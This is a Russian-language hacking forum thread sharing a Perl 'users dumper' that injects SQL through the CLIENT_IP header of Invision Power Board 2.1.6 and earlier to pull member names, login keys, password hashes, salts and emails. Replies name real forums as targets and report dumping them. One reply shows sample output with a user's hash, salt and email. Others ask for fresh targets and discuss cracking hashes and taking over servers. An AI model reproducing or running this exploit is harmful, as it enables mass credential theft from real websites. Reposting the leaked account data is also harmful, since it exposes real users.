В общем на основе сплоита от РСТ для IPB <= 2.1.6 решил написать дампилку юзерской базы.
Писал для себя вообще, ну решил здесь выложить, может кому еще пригодится...
Впринципе удобно, весь процесс отображается в окне, а результат сохраняется в файле result.txt в каталоге в котором находится сплоит.
Формат данных:

Name: *
Login Key: *
Pass Hash: *
Pass Salt: *
E-Mail: *

Кому не нравится - большая просьба просто воздержаться от каких либо комментариев, ругани в свой адресс от античатовцев я наслушался уже достаточно.

#!/usr/bin/perl

use LWP::UserAgent;
use Getopt::Std;

getopts("p:i:P:f:t:");

$path = $opt_p;
$from = $opt_f;
$to = $opt_t;
$prefix = $opt_P || 'ibf_';

$|++;

if(!$path || !$from || !$to || ($from > $to)) { &usage; }
&head();
print "TEST FORUM ...";
if(get_info($prefix,$id,0) == 1) { print " FORUM VULNERABLE\n"; }
else { print " FORUM UNVULNERABLE\n"; exit(); }

open(RES,">result.txt");

for($i=$from;$i<$to;$i++) { get_info($prefix,$i,1); }

sub get_info($$$)
{
$xpl = LWP::UserAgent->new( ) or die;
$rep = '';
if($_[2] == 1)
{

$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($rep)!=32) { print "$_[1])\nName: $rep\n"; print RES "$_[1])\nName: $rep\n"; }
else { print ""; }
$name = $rep;

$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT member_login_key,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.{32})"/) { $rep = $3; }
if(length($name)==32) { print ""; }
else { print "Login Key: $rep\n"; print RES "Login Key: $rep\n"; }

$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT converge_pass_hash,1,1,1 FROM ${_[0]}members_converge WHERE converge_id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($name)==32) { print ""; }
else { print "Pass Hash: $rep\n"; print RES "Pass Hash: $rep\n"; }

$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT converge_pass_salt,1,1,1 FROM ${_[0]}members_converge WHERE converge_id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($rep)!=32) { print "Pass Salt: $rep\n"; print RES "Pass Salt: $rep\n"; }
else { print ""; }

$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT email,1,1,1 FROM ${_[0]}members WHERE id=$_[1]/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if(length($rep)!=32) { print "E-Mail: $rep\n\n"; print RES "E-Mail: $rep\n\n ****** \n\n"; }
else { print ""; }
}
elsif($_[2] == 0)
{
$res = $xpl->get($path."?s=1",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/**");
if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
if($rep eq 'VULN') { return 1; }
else { return 0; }
}
}

sub usage()
{
&head();
print "| Usage: |\n";
print "| <sploit>.pl -p [path] -f [u_id] -t [u_id] |\n";
print "| -p [path] ~ path to index.php |\n";
print "| -f [num] ~ get data from this id |\n";
print "| -t [num] ~ get data to this id |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
exit();
}

sub head()
{
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
print "| IPB <= 2.1.6 Users Dumper |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
print "| Based on RST IPB <= 2.1.6 Mail Sploit |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
print "| Modified by Driver |\n";
print "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n";
}

чЕт он запускаться не хочет.Напиши пример че там писать надо

2Driver Бугого как ты написал не зная perl ??
З.Ы копирайты даже моя бабушка может подправить))

Не, у меня вроде запустился, но че-то я так и не нашел уязвимого форума...
Вообще штука была бы хорошая если б на свежую багу...
А еще, неплохо чтоб писалось там "connecting", а если не коннектинг - то почему и т.п... а то даже непонятно, пытался сплойт в инет выйти или не..

http://guild.murdoch.edu.au/forums/
http://recserver.colorado.edu/forum/
http://www.getskinned.org/forums/


Вроде как vulnerablы своим сканером насканил - проверяйте )

Ну я perl тоже почти не знаю. А этот сплойт малось переделал(научил пароли к закрытым форумам тырить).

2Driver Бугого как ты написал не зная perl ??
З.Ы копирайты даже моя бабушка может подправить))

А ты кто такой?
P.S.: Я сказал, что чуть чуть передалал исходный сплоит, и не более того.
Я же попросил - кому не нравится - не отписывайтесь...
P.S.S.: Запускать как обычный сплоит, перлом.

http://guild.murdoch.edu.au/forums/
http://recserver.colorado.edu/forum/
http://www.getskinned.org/forums/


Вроде как vulnerablы своим сканером насканил - проверяйте )

Со всех трех снял дампы. Вот первые 10 юзеров с каждого форума (дампит естественно только существующих юзеров, а перебирает весь указанный Вами диапазон ID по порядку):

Диапазон был. Теперь удалён. Это не Халява, это Уязвимости форумов, а не уязвимые форумы. За флуд бить буду.(Последнее относится ко всем, кто отметился в топике)

очень удобно, хотя мало уже их осталось



bash-2.05b$ perl dump.pl -p http://www.forum.vipuskniki-2000.ru/ -f 1 -t 1
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| IPB <= 2.1.6 Users Dumper |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| Based on RST IPB <= 2.1.6 Mail Sploit |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
| Modified by Driver |
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+
TEST FORUM ... FORUM VULNERABLE
1)
Name: empirator
Login Key: 10760b34b06c8b2a97b9939c08aaf3a5
Pass Hash: 8c336d0ce5e853612e08159035ddf2aa
Pass Salt: jm7||
E-Mail: empirator@km.ru




и в файле все остается

ipb216_dumper.pl -p http://www.getskinned.org/forums/ -f 1 -t 10
Я так и запускаю.Не запускается хрень каккую- то пишет.Может защита от кидесов стойт?Я в перле не шарю.

Гы...Гы кинь что пишет хоть K.e.H, а то не хочеться проверять ))

Сплойт работает. Всё круто. :d
Драйвер молодец.
Респект.

Test forum и дальше хрень всякую

Молодец сплойт класный!! Ты б не мог еще добавить чтоб аськи выдерала?

Сплоит пашит, все отлично, нужно токо нормальный перл скачать, не качайте с denwer.ru, там отстойный, нормальный перл весит около 12мб

K.e.H хахаха! Лолка- он пишет- Test Forum Unvulneralable- то есть форум неуязвим на эту багу или можно так сказать форум пропачен!

Бывает и такое =))))) Пробуй, есть и уязвимые хотя их ох как мало осталось..

Клёвый ЕКСПЛОЙТ все работаеть =)
РЕСПЕКТ

ПРотестил всё! Неффтяк! Теперь надо порутать сервак! Спасиб за сплойт!

Люди выложите плиз парочку уязвимых форумов! А то своих уже неосталось!

А логин кей (Login key) это что? И куда его можно пихнуть

А логин кей (Login key) это что? И куда его можно пихнуть
Тебе он ненадо ,тебе надо только :
converge_pass_hash
converge_pass_salt
Потом поробуй розшифровать и всё ...

Can't locate LWP/UserAgent.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.8.7 /usr/local/share/perl/5.8.7 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.8 /usr/share/perl/5.8 /usr/local/lib/site_perl .) at i216.pl line 3.
BEGIN failed--compilation aborted at i216.pl line 3.

вот такая вот ерунда, товарищи. Сижу под ubuntu. Перл последней версии..

Оно говорит что у тебя нету беблиотеки ...
Вот скачай полный..
http://downloads.activestate.com/ActivePerl/Windows/5.6/ActivePerl-5.6.1.638-MSWin32-x86.msi

Пасибо, канеч. Тока я уже написал, что под Линухем сижу. Мне бы ссыль на сборник перловских библиотек.. (ушел в гугль)